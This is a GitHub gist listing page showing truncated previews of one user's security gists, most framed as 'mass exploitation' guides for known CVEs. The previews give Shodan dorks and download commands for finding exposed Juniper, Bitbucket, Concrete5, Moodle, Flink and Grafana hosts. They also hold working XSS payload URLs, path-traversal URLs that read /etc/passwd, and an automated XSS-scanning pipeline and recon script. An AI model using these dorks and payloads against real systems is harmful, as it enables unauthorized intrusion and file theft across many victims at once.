Simba Gill simrotion13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi Guys.. | |
| In this video, we will see mass exploitation of Juniper Web Device Manager - RCE vulnerability (CVE-2023-36845). | |
| Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands | |
| Shodan Dork : title:"Juniper" http.favicon.hash:2141724739 | |
| Download the results using below command ( Shodan Premium API Key is needed ) |
simrotion13
/ CVE-2022-36804
Last active
September 22, 2022 17:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi Guys.. | |
| Today We explore the Atlassian Bitbucket Command Injection Vulnerability(CVE-2022-36804) | |
| Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request | |
| Shodan Dork : 'http.component:"BitBucket"' | |
| Run below commands to download the results ( Shodan Premium API Key is needed ) | |
| shodan download bitbucket 'http.component:"BitBucket"' <--- This will download 1000 results |
simrotion13
/ xss-one-liner
Last active
March 16, 2023 22:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #cat targets_urls.txt | |
| http://testphp.vulnweb.com | |
| ## Command Line | |
| gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt | |
| #tool used | |
| #https://github.com/jaeles-project/gospider | |
| #https://github.com/tomnomnom/qsreplace |
simrotion13
/ get-shodan-favicon-hash.py
Last active
March 16, 2023 22:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #python3 need | |
| #Install mmh3 by running command pip install mmh3 | |
| import mmh3 | |
| import requests | |
| import codecs | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
| response = requests.get('https://licious.in/favicon.ico', verify=False) |
simrotion13
/ mass-recon.sh
Created
July 23, 2022 06:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| filename=$1 | |
| resolversFile=$2 | |
| resultDir=~/recon/output | |
| nucleiTmpDir=~/nuclei-templates | |
| Header='User-Agent: Mozllla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKlt/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safarl/537.36' | |
| nuclei -ut | |
| for line in $(cat $1); do |
simrotion13
/ Concrete5 CMS XSS vulnerability
Created
January 6, 2022 14:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Concrete5 CMS XSS vulnerability tweet by Jackson | |
| Shodan Dork : 'Set-Cookie: CONCRETE5' | |
| Vulnerable URL : | |
| https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)> | |
| By using below URL we can download the results. ( Shodan Premium API Key is needed ) | |
| shodan download concrete5 'Set-Cookie: CONCRETE5' |
simrotion13
/ Moodle XSS vulnerability
Last active
January 6, 2022 14:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Moodle XSS vulnerability | |
| Shodan Dork : 'http.component:Moodle' | |
| Vulnerable URL : | |
| https://IP/mod/lti/auth.php?redirect_uri=javascript:alert(document.domain) | |
| By using below URL we can download the results. ( Shodan Premium API Key is needed ) | |
| shodan download moodle http.component:Moodle' |
simrotion13
/ CVE-2020-17519
Last active
May 1, 2023 06:14
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519] | |
| Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. | |
| Shodan Dork : 'Apache Flink' | |
| Affected Version : 1.11.1 and 1.11.2 | |
| Vulnerable URL : | |
| https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd |
simrotion13
/ CVE-2021-43798
Created
January 6, 2022 14:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798). | |
| Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files. | |
| Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. | |
| Vulnerable URL : | |
| http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd | |
| Shodan Dork : http.title:"grafana" |
simrotion13
/ CVE-2021-44228
Created
January 6, 2022 14:32
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. | |
| Prerequiste | |
| Docker must be install. Go to below link to see how to install docker on kali linux | |
| https://youtu.be/xN2JGqiqgow | |
| Steps | |
| A) Download log4j vulnerable app from below github link | |
| https://github.com/simrotion13/log4shell-vulnerable-app |
NewerOlder